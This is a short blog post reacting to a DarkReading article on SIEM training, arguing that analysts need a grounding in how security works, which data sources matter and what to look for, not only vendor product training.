Article at DarkReading titled: SIEM Training Needs a Better Focus on the Human Factor. Pretty short article, but has a good point to make.
Training from SIEM vendors is based on how to use their products. This is and should be required to properly use any solution, but it isn’t enough. SIEM is a tool, and the focus must also be on the individual(s) wielding the tool.
By changing the focus to individuals, the core problem can start to be addressed. For example, assume you or another staff member attended training on how to catch the bad guys using a SIEM system. The focus, rather than being on maintaining/using a SIEM product, is on things such as which data sources are important, why they’re important, and how to enrich those data sources so they make more sense, add context, and are more useful. The training may also include various methods to intentionally set up events to automatically send alerts on unauthorized activity. Would this individual not be better equipped to use any SIEM platform?
Yes, to the last question! This is why I believe in knowing how security works. Knowing how the surgical, smaller tools work. And exactly what you’re looking at and looking for. If you know the basics and have a strong foundation, you can probably wield any larger tool with a small amount of time to learn the specifics to that tool. Not only that, but you can even ask about and properly evaluate a new tool better!
I also like a sub-point the author makes by using PowerShell malware detection as an example. Vendors aren’t going to teach an analyst what to look for. You have to learn it elsewhere or figure it out. And that’s not necessarily intuitive. That’s part of the sauce that makes infosec practioners a somewhat advanced profession.